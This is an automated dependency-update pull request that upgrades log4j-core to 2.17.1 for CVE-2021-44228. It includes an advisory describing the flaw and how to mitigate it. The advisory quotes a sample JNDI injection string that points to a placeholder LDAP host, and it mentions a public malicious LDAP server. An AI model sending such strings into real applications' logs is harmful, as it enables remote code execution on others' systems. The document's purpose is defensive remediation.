### PR TITLE
[🐸 Frogbot] Update version of org.apache.logging.log4j:log4j-core to 2.17.1

### DIFF
--- a/pom.xml
+++ b/pom.xml
@@ -32,7 +32,7 @@
         <dependency>
             <groupId>org.apache.logging.log4j</groupId>
             <artifactId>log4j-core</artifactId>
-            <version>2.14.0</version>
+            <version>2.17.1</version>
         </dependency>
 
          <dependency>


### PR DESCRIPTION


[comment]: <> (FrogbotReviewComment)

<div align='center'>

[![🚨 This automated pull request was created by Frogbot and fixes the below:](https://raw.githubusercontent.com/jfrog/frogbot/master/resources/v2/vulnerabilitiesFixBannerPR.png)](https://docs.jfrog-applications.jfrog.io/jfrog-applications/frogbot)

</div>



### 📦 Vulnerable Dependencies

<div align='center'>

| Severity                | ID                  | Contextual Analysis                  | Direct Dependencies                  | Impacted Dependency                  | Fixed Versions                  |
| :---------------------: | :-----------------------------------: | :-----------------------------------: | :-----------------------------------: | :-----------------------------------: | :-----------------------------------: |
| ![critical](https://raw.githubusercontent.com/jfrog/frogbot/master/resources/v2/applicableCriticalSeverity.png)<br>Critical | CVE-2021-44228 | Applicable | org.apache.logging.log4j:log4j-core:2.14.0 | org.apache.logging.log4j:log4j-core 2.14.0 | [2.12.2]<br>[2.15.0]<br>[2.3.1] |

</div>


### 🔖 Details



### Vulnerability Details
|                 |                   |
| --------------------- | :-----------------------------------: |
| **Jfrog Research Severity:** | <img src="https://raw.githubusercontent.com/jfrog/frogbot/master/resources/v2/smallCritical.svg" alt=""/> Critical |
| **Contextual Analysis:** | Applicable |
| **Direct Dependencies:** | org.apache.logging.log4j:log4j-core:2.14.0 |
| **Impacted Dependency:** | org.apache.logging.log4j:log4j-core:2.14.0 |
| **Fixed Versions:** | [2.12.2], [2.15.0], [2.3.1] |
| **CVSS V3:** | 10.0 |

An unsafe deserialization in log4j leads to Java code injection when logging a crafted string.

### 🔬 JFrog Research Details

**Description:**
[Apache Log4j](https://logging.apache.org/log4j/2.x/) is a ubiquitous Java-based logging framework.

Due to the `JndiLookup` message lookup feature supported by default in log4j < 2.15.0, 
An application that uses Log4j  2.0.0-2.14.1 can be remotely exploited if a remote attacker can cause arbitrary strings to be logged. Specifically, an attacker must be able to supply a partial string to one of the logging APIs - `logger.info()`, `logger.debug()`, `logger.error()`, `logger.fatal()`, `logger.log()`, `logger.trace()` or `logger.warn()`.

When an attacker sends a JNDI lookup string such as - `${jndi:ldap://<hostname>:<port>/foo}`, log4j will attempt to load an arbitrary class from the supplied JNDI host which leads to arbitrary Java code injection. There are many public implementations of malicious LDAP JNDI servers that can serve any attacker code, such as the one by [marshalsec](https://github.com/mbechler/marshalsec/blob/master/src/main/java/marshalsec/jndi/LDAPRefServer.java).

Due to ease of exploitation, the vulnerability has been reported to be exploited in the wild, and many exploit PoCs are available on Github.

Note that Java runtimes of version 6u211, 7u201, 8u191, 11.0.1 or any later version are not susceptible to the LDAP-based exploit, since JNDI cannot load a remote codebase using LDAP (due to the `com.sun.jndi.ldap.object.trustURLCodebase` configuration).

The affected Maven package is [log4j-core](https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-core).

**Remediation:**
##### Deployment mitigations

Upgrade your Java runtime to one of the following versions (or any later version):
6u211, 7u201, 8u191, 11.0.1.

This method is less recommended than the other deployment mitigations, since it only protects against the LDAP exploit (which is the widely published exploit), but potentially leaves other context-dependent JNDI injections open.

##### Deployment mitigations

**Method 1 - Disabling Lookups in log messages:**
If using log4j 2.10.0 or any later version, add the following (JVM) command-line flag when running the vulnerable Java application: `‐Dlog4j2.formatMsgNoLookups=True`

Alternatively, this can be configured globally by setting the environment variable `LOG4J_FORMAT_MSG_NO_LOOKUPS` to `true` by executing this command before Java applications are loaded:
```
export LOG4J_FORMAT_MSG_NO_LOOKUPS=true
```

**Method 2: Removing the vulnerable class:**
If using an older log4j version, remove the `JndiLookup` class from any Java applications by executing this:
```
find ./ -type f -name "*.jar" -exec zip -q -d "{}" org/apache/logging/log4j/core/lookup/JndiLookup.class \;
```
This will recursively find all JAR files in the current directory and remove the vulnerable `JndiLookup` class from them. It is recommended to execute this command on the root directory of your project or server.

Note: This method is recommended only as last resort. It is possible that the vulnerable `JndiLookup` class is embedded in a recursive JAR files or in locations that the zip command is not accessible to. When choosing this method, it is highly recommended to verify munally that no `JndiLookup.class` are left in any Java application.



---
<div align='center'>

[🐸 JFrog Frogbot](https://docs.jfrog-applications.jfrog.io/jfrog-applications/frogbot)

</div>
